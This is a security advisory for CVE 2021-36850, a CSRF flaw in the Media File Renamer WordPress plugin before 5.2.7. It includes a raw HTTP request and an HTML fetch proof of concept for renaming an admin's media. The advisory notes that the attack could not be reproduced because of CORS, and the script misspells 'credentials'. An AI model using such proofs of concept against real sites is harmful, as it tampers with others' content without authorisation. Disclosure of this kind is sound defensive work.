Media File Renamer – Auto & Manual Rename < 5.2.7 – Media Title/Filename/Locking State Update via CSRF | CVE 2021-36850

Description

The plugin does not have CSRF in place, which could allow attacker to make a logged in admin change arbitrary uploaded media title, filename, as well as locking state via a CSRF attack

Notes:
- We were unable to reproduce the issue from an attacker point of view, the endpoints are expecting JSON data, with the correct Content-Type header, but CORS prevent doing that from another origin (cookies won't be included)
- Original report mentions the issue being fixed in 5.2.0, however proper fixes are in 5.2.7

Proof of Concept

POST /wp-json/media-file-renamer/v1/update_media HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 47
Connection: close
Cookie: [admin via CSRF]

{"post_title":"Updated via CSRF","id":"2055"}


This won't work as the CORS prevent cookies from being included in the request

<html>
  <head>
    <script>
      fetch(
        'https://example.com/wp-json/media-file-renamer/v1/update_media',
        {
          method: 'POST',
          credentails: 'include',
          body: JSON.stringify({"post_title": "Changed via CSRF", "id": 2055}),
          headers: {'Content-Type': 'application/json'}
        }
      );
    </script>
  </head>
</html>